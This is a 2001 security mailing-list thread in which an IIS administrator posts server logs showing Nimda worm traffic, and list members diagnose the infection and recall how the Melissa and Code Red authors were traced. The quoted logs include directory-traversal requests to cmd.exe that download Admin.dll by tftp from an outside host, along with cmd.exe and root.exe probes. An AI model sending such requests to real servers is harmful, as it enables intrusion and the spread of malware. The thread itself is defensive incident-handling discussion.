Mike, Here is a good starting place http://www.microsoft.com/technet/treeview/default.asp?url=/technet/itsolutio This link is for a Microsoft TechNet page describing security issue for web sites. They also have a "batten down the hatches" script for IIS but I cannot find the url for that page. Doug > -----Original Message----- > From: owner-crime@/var/spool/majordomo/lists/crime > [mailto:owner-crime@/var/spool/majordomo/lists/crime]On Behalf Of > J.Michael Cuciti > Sent: Friday, September 21, 2001 2:33 PM > To: dldean; Kuo Jimmy > Cc: crime@private > Subject: Re: [RE: [RE: Any leads?]] > > > Yes, I am 206.98.124.52. The ADMIN.DLL file was deleted and the > directories > the event view is referencing do not exist on my system. I have > followed all > instruction for removal from variuos postings from CRIME. No > file refernced > in posting are on my system. > > Do any of you know how I might stop this attack? > > -Mike > > > > dldean@private (dldean) wrote: > This is 206.98.124.52 receiving get requests for the admin.dll from > 206.98.79.246 and directory requests for his machine from > 206.252.224.50 & > 208.238.181.162 . > > Doug > > > -----Original Message----- > > From: owner-crime@/var/spool/majordomo/lists/crime > > [mailto:owner-crime@/var/spool/majordomo/lists/crime]On Behalf Of Kuo, > > Jimmy > > Sent: Friday, September 21, 2001 2:06 PM > > Cc: crime@private > > Subject: RE: [RE: Any leads?] > > > > > > Oh, I didn't notice the followup questions you asked the first time. > > > > I don't know about the structure of your logs. But are you > 206.98.124.52? > > > > Could someone who reads IIS logs say if this is him sending or receiving > > GETs? > > > > And this is definitely Nimda. I just don't know if you're the > > target or the > > culprit. If you haven't upgraded, I'm tempting to believe > you're infected > > and attacking others. The TFTP command shows up only on or after > > infection. > > And ADMIN.DLL (Nimda is admin spelt backwards) is also something > > that shows > > up after infection. But then you say you don't have it... > > > > Jimmy > > > > > -----Original Message----- > > > From: J.Michael Cuciti [SMTP:mcuciti@private] > > > Sent: Friday, September 21, 2001 1:44 PM > > > To: Kuo Jimmy; Crispin Cowan; Jimmy Sadri > > > Cc: crime@private > > > Subject: Re: [RE: Any leads?] > > > > > > All: > > > > > > I still have a script trying to run, but the location and > folder doesn't > > > exist. The is what I found in my log file: > > > > > > 206.98.79.246, -, 9/18/01, 7:29:26, W3SVC, WWW, > 206.98.124.52, 150, 151, > > > 304, > > > 200, 0, GET, /scripts/..%2f../winnt/system32/cmd.exe, > > > /c+tftp%20-i%20206.98.79.246%20GET%20Admin.dll%20c:\Admin.dll, > > > > > > 206.98.79.246, -, 9/18/01, 7:29:27, W3SVC, WWW, > 206.98.124.52, 180, 151, > > > 304, > > > 200, 0, GET, /scripts/..%2f../winnt/system32/cmd.exe, > > > /c+tftp%20-i%20206.98.79.246%20GET%20Admin.dll%20d:\Admin.dll, > > > > > > 206.252.224.50, -, 9/18/01, 7:29:33, W3SVC, WWW, > 206.98.124.52, 10, 72, > > > 273, > > > 403, 5, GET, /scripts/root.exe, /c+dir, > > > > > > 206.252.224.50, -, 9/18/01, 7:29:38, W3SVC, WWW, > 206.98.124.52, 80, 96, > > > 1652, > > > 200, 0, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir, > > > > > > 208.238.181.162, -, 9/18/01, 7:29:46, W3SVC, WWW, > 206.98.124.52, 10, 97, > > > 243, > > > 500, 123, GET, /scripts/..A ../winnt/system32/cmd.exe, /c+dir, > > > > > > If anybody knows what this is, please 'spain it to me. > > > > > > I am running IIS 3.0, NT4.0 w/sp3 (haven't ungraded, I > > inherited this, not > > > my > > > fault :-) ) > > > > > > In the event log I see this same type of message running every few > > > minutes. > > > The script is supposedly running from > > > \winnt\iisadmin\Scripts\..%5c..\admin.dll. This does not exist. > > > > > > Thanks... > > > > > > Mike Cuciti > > > Network Service and Support MAnager > > > Tuality Healthcare > > > 681.1749 > > > > > > > > > "Kuo, Jimmy" <Jimmy_Kuo@private> wrote: > > > >The Melissa author was caught because he posted the infectious > > document > > > >from his own AOL account to a news group, rather than releasing it > > > >through a hacked account. His guilt was confirmed when the > > serial number > > > >in the document matched the PC in the dumpster outside his > bedroom :-) > > > > > > No. He used a hacked acct. But we identified the exact time > of the use > > > of > > > the acct (newsgroup posting message ID) and the FBI traced the phone > > > records. > > > > > > And the PC was destroyed and never located. > > > > > > Where did you get your version of the story? > > > > > > >But Code Red and its derivatives is not an Office document, and > > > >therefore has no serial numbers. That investigators appear to have no > > > >leads months after Code Red appeared tells me that it was likely > > > >released to the wild from a compromised machine, or perhaps > > > >simultaneously released from multiple compromised machines. If the > > > >author(s) were good, then those compromised machines were initially > > > >attacked from other compromised machines. Likely all of these initial > > > >release vector machines have long since been wiped and > > re-installed, and > > > >the links to the author(s) have been cut. > > > > > > We have some "first instances" of traffic. I don't know what > the FBI's > > > doing with the information gathered so far. But I agree that it's > > > difficult > > > and not likely. > > > > > > Jimmy > > > > >
This archive was generated by hypermail 2b30 : Sun May 26 2002 - 11:25:48 PDT